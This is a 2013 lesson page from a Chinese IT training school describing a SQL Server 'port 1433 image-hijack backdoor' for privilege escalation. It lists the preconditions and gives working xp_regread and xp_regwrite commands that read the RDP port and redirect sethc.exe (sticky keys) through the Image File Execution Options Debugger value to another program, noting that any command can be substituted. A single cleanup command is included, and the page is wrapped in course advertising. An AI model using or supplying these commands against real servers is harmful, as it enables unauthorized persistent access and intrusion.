欢迎访问北大青鸟鲁广校区~

  1. 加入收藏
  2. 设为主页
  3. 学校简介

三分钟了解北大青鸟

×
  • 北大青鸟大数据课程
  • 北大青鸟网络工程师
  • 北大青鸟web设计专业
  • 北大青鸟PHP专业
  • 北大青鸟启蒙星课程

北大青鸟数据库技术 1433映像劫持后门提权

责任编辑:027hpedu来源:北大青鸟鲁广校区数据库技术教程发布时间:2013-04-23 15:14
导读:北大青鸟数据库技术:1433映像劫持后门提权。

  北大青鸟数据库技术:1433映像劫持后门提权。

    1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)

  2.服务器的粘滞键功能无损,只要可以正常弹出即可

  3.服务器未禁止注册表编辑(即写入功能)

  sql命令读取服务器终端端口:

  exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-

  Tcp','PortNumber'

  1.sql命令查询注册表粘滞键是否被劫持

  exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

  2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)

  xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',

  'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'

  3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用

  xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'

    了解更多北大青鸟数据库技术请继续关注武汉北大青鸟官网。

本文标题:北大青鸟数据库技术 1433映像劫持后门提权,责任编辑:027hpedu,来源:北大青鸟武汉宏鹏鲁广校,于2013年04月23日15时14分发布于北大青鸟鲁广校区。武汉北大青鸟宏鹏鲁广校区,是北大青鸟武汉电脑学校,专业IT计算机培训,拥有软件/网络/安卓/Web前端/Java课程.北大青鸟地址:光谷广场鲁巷数码港.电话:027-87807717

专业老师指导

赵老师

从事IT教育培训十年有余,致力于帮助广大学子找到适合自己的专业。

培训咨询客服

刘老师

IT培训专业客服,用自己的真诚解决了无数学子的困惑。

本文地址:
文章标题:
  • 北大青鸟Java软件开发
  • 北大青鸟UI设计课程_零基础可学
  • 北大青鸟动漫设计_武汉设计学校
  • 北大青鸟数字艺术_武汉电脑学校
×
在线咨询更多问题

如您有任何疑问
在线咨询随时为您解答或拨打咨询热线:17740513250

×
  • 姓 名*
  • 手 机*
  • QQ号/微信号
  • 所报学科 *
  • 其他备注
  • 温馨提示:请保持手机畅通,咨询老师将为您提供专属的一对一报名服务。